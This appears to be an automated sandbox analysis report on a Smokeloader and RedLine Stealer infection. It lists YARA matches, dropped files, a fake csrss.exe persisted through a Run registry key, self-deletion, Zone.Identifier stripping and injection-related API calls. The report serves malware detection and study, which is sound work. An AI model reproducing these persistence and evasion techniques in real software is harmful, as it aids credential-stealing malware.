                      Source: 0000000C.00000002.2635807336.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000000.00000002.2209182155.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000017.00000002.2876036619.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: String function: 0061227F appears 51 times
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: String function: 006A18F8 appears 37 times
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: String function: 006130DA appears 53 times
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: String function: 0061534E appears 31 times
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401590
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015CB
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040159B
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015BC
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401590
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015CB
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040159B
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015B0
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015BC
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA7E00 NtCreateThreadEx,9_2_04BA7E00
                      Source: file.exe, 00000000.00000000.2095261210.00000000007BF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLameros.exe0 vs file.exe
                      Source: 501B.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: csrss.exe.17.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 451C.dll.2.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT size: 0xd0 address: 0x0
                      Source: 451C.dll.2.drStatic PE information: Section: CRT ZLIB complexity 0.9989425823252688
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fjdvfwiJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/31@555/34
                      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: file.exeReversingLabs: Detection: 40%
                      Source: file.exeVirustotal: Detection: 44%
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\fjdvfwi C:\Users\user\AppData\Roaming\fjdvfwi
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\451C.dll
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\451C.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4888.exe C:\Users\user\AppData\Local\Temp\4888.exe
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4AFA.exe C:\Users\user\AppData\Local\Temp\4AFA.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\501B.exe C:\Users\user\AppData\Local\Temp\501B.exe
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 360
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeProcess created: C:\Users\user\AppData\Local\Temp\501B.exe C:\Users\user\AppData\Local\Temp\501B.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6942.exe C:\Users\user\AppData\Local\Temp\6942.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\wjdvfwi C:\Users\user\AppData\Roaming\wjdvfwi
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\451C.dllJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4888.exe C:\Users\user\AppData\Local\Temp\4888.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4AFA.exe C:\Users\user\AppData\Local\Temp\4AFA.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\501B.exe C:\Users\user\AppData\Local\Temp\501B.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6942.exe C:\Users\user\AppData\Local\Temp\6942.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe" Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\451C.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeProcess created: C:\Users\user\AppData\Local\Temp\501B.exe C:\Users\user\AppData\Local\Temp\501B.exeJump to behavior
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b8967f85-58ae-4f46-9fb2-5d7904798f4b}\InProcServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\451C.tmpJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091E9B8 CreateToolhelp32Snapshot,Module32First,0_2_0091E9B8
                      Source: 10.2.4888.exe.6e1000.1.raw.unpack, Strings.csBase64 encoded string: 'Kjg6GTs4AQYhDjgiE14vMRYYOSouQjUmPw41eD0iKBw0WSZAKF8+PzkoLx4SDw1EJgM/HSAJCyAXCF9Q'
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3796
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: C:\cgAUC0kVAbAHm68KluuRgWekCUenpnKE\SportSuit.pdb source: 4888.exe, 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: C:\cgAUC0kVAbAHm68KluuRgWekCUenpnKE\SportSuit.pdb% source: 4888.exe, 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiUnpacked PE file: 6.2.fjdvfwi.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeUnpacked PE file: 12.2.4AFA.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeUnpacked PE file: 18.2.6942.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiUnpacked PE file: 25.2.wjdvfwi.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014A1 push es; iretd 0_2_004014A3
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004022A8 pushfd ; ret 0_2_004022C7
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D452 push ebp; retf 0_2_0040D453
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E135 push ecx; ret 0_2_0040E148
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089230F pushfd ; ret 0_2_0089232E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00891506 push es; iretd 0_2_0089150A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091F8BB push es; iretd 0_2_0091F8DB
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091FDD1 push 8A1E29FAh; iretd 0_2_0091FDD6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009203F6 pushfd ; ret 0_2_009204D5
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009264FE push cs; iretd 0_2_00926500
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00922C5D push ss; iretd 0_2_00922C63
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_004014A1 push es; iretd 6_2_004014A3
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_004022A8 pushfd ; ret 6_2_004022C7
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_0040D452 push ebp; retf 6_2_0040D453
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_0040E135 push ecx; ret 6_2_0040E148
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_007FF876 pushfd ; ret 6_2_007FF955
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_007FF251 push 8A1E29FAh; iretd 6_2_007FF256
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_007FED3B push es; iretd 6_2_007FED5B
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_008020DD push ss; iretd 6_2_008020E3
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_0080597E push cs; iretd 6_2_00805980
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_02301506 push es; iretd 6_2_0230150A
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_0230230F pushfd ; ret 6_2_0230232E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_04BA9984 push esi; mov dword ptr [esp], 9068552Dh9_2_04BA9985
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_00612220 push ecx; ret 10_2_00653733
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_06A2A8C0 push eax; iretd 11_2_06A2A8C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_06A20863 push es; ret 11_2_06A20870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_09120190 push cs; ret 11_2_091201A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_09E11120 push eax; ret 11_2_09E1132D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_09E14D30 push eax; ret 11_2_09E14EA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_09E15C90 push eax; ret 11_2_09E15FA1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_09E15078 push eax; ret 11_2_09E156F5
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\451C.dll
                      Source: 451C.dll.2.drStatic PE information: section name: CRT
                      Source: 4888.exe.2.drStatic PE information: section name: .00cfg
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.059424308779941
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.971907249615657
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.073217916694136
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.077397822606895
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.073217916694136
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.059424308779941
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.971907249615657
                      Source: 10.2.4888.exe.6e1000.1.raw.unpack, k70KkPSYVkuFJlYv6G.csHigh entropy of concatenated method names: 'CbgUsL79H', 'rei3mYKr3', 'Xm6eS8pSU', 'VE3pfJOLD', 'wS4kfqx1I', 'ln8yAMBeV', 'e7YBZZkWd', 'NYXxkJmxy', 'krd9OFnVt', 'DHNzaj8Ud'

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wjdvfwiJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fjdvfwiJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wjdvfwiJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\451C.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6942.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\501B.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fjdvfwiJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4888.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4AFA.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\fjdvfwi:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wjdvfwi:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
